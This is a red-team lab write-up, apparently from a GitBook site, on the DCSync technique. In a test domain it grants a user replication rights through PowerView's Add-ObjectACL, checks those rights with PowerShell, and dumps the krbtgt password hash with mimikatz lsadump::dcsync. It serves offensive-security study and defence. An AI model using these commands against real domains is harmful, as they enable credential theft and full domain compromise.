Red Teaming Experiments
Red Teaming Experiments
linkedin
github
@spotheplanet
patreon
What is this?
Pinned
Pentesting Cheatsheets
Active Directory & Kerberos Abuse
From Domain Admin to Enterprise Admin
Kerberoasting
Kerberos: Golden Tickets
Kerberos: Silver Tickets
AS-REP Roasting
Kerberoasting: Requesting RC4 Encrypted TGS when AES is Enabled
Kerberos Unconstrained Delegation
Kerberos Constrained Delegation
Kerberos Resource-based Constrained Delegation: Computer Object Take Over
Domain Compromise via DC Print Server and Kerberos Delegation
DCShadow - Becoming a Rogue Domain Controller
DCSync: Dump Password Hashes from Domain Controller
PowerView: Active Directory Enumeration
Abusing Active Directory ACLs/ACEs
Privileged Accounts and Token Privileges
From DnsAdmins to SYSTEM to Domain Compromise
Pass the Hash with Machine$ Accounts
BloodHound with Kali Linux: 101
Backdooring AdminSDHolder for Persistence
Active Directory Enumeration with AD Module without RSAT or Admin Privileges
Enumerating AD Object Permissions with dsacls
Active Directory Password Spraying
offensive security
Red Team Infrastructure
Initial Access
Code Execution
Code & Process Injection
Defense Evasion
Enumeration and Discovery
Privilege Escalation
Credential Access & Dumping
Lateral Movement
Persistence
Exfiltration
reversing, forensics & misc
Windows Kernel / Internals
Exploring Process Environment Block
ETW: Event Tracing for Windows 101
Parsing PE File Headers with C++
Exploring Injected Threads
Dump Virtual Box Memory
AES Encryption Using Crypto++ .lib in Visual Studio C++
Reversing Password Checking Routine
Powered by GitBook

DCSync: Dump Password Hashes from Domain Controller

This lab shows how a misconfigured AD domain object permissions can be abused to dump DC password hashes using the DCSync technique with mimikatz.

It is known that the below permissions can be abused to sync credentials from a Domain Controller:

http://www.harmj0y.net/blog/redteaming/abusing-active-directory-permissions-with-powerview/

Execution

Inspecting domain's offense.local permissions, it can be observed that user spotless does not have any special rights just yet:

Using PowerView, we can grant user spotless 3 rights that would allow them to grab password hashes from the DC:

attacker@victim
Add-ObjectACL -PrincipalIdentity spotless -Rights DCSync

Below shows the above command and also proves that spotless does not belong to any privileged group:

However, inspecting offense.local domain object's privileges now, we can see 3 new rights related to Directory Replication added:

Let's grab the SID of the user spotless with whoami /all:

Using powerview, let's check that the user spotless S-1-5-21-2552734371-813931464-1050690807-1106 has the same privileges as seen above using the GUI:

attacker@kali
Get-ObjectAcl -Identity "dc=offense,dc=local" -ResolveGUIDs | ? {$_.SecurityIdentifier -match "S-1-5-21-2552734371-813931464-1050690807-1106"}

Additionally, we can achieve the same result without PowerView if we have access to AD Powershell module:

attacker@victim
Import-Module ActiveDirectory
(Get-Acl "ad:\dc=offense,dc=local").Access | ? {$_.IdentityReference -match 'spotless' -and ($_.ObjectType -eq "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2" -or $_.ObjectType -eq "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2" -or $_.ObjectType -eq "89e95b76-444d-4c62-991a-0facbeda640c" ) }

See Active Directory Enumeration with AD Module without RSAT or Admin Privileges to learn how to get AD module without admin privileges.

DCSyncing Hashes

Since the user spotless has now the required privileges to use DCSync, we can use mimikatz to dump password hashes from the DC via:

attacker@victim
lsadump::dcsync /user:krbtgt

References

Previous
DCShadow - Becoming a Rogue Domain Controller
Next
PowerView: Active Directory Enumeration
Last updated 9 months ago
Contents
Execution
DCSyncing Hashes
References